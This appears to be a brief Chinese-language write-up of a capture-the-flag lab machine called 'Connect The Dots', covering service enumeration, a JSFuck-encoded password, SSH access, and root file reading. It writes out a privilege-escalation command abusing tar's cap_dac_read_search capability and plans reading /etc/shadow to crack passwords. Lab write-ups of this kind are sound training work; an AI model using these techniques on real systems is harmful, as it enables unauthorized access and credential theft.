---
Connect The Dots
usershell
目标IP:192.168.205.142
服务探测:
21/tcp open ftp vsftpd 2.0.8 or later
80/tcp open http Apache httpd 2.4.38 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
2049/tcp open nfs 3-4 (RPC #100003)
7822/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
33461/tcp open nlockmgr 1-4 (RPC #100021)
43979/tcp open mountd 1-3 (RPC #100005)
50765/tcp open mountd 1-3 (RPC #100005)
53391/tcp open mountd 1-3 (RPC #100005)
看到nfs,尝试挂载到本地,但是没什么用,只读文件,并且没什么可利用的点
对Web服务进行探测,目录扫描没有什么信息
查看html注释,得到mysite
目录,目录下的bootstrap.min.cs
文件是一段Jsfuck编码,解码得到norris
用户的密码
ssh连接拿到user权限
root
并未getshell,只能实现任意文件读取
capabilities
提权
whereis getcap
得到/usr/sbin/getcap
/usr/sbin/getcap -r / 2>/dev/null
/usr/bin/tar = cap_dac_read_search+ep
可以看到/usr/bin/tar
有以root
身份读取文件的权限
可以看作受限制的suid提权
先读取flag
tar xf "/root/root.txt" -I '/bin/sh -c "cat 1>&2"'
getshell的尝试
- 读取
/etc/shadow
,爆破密码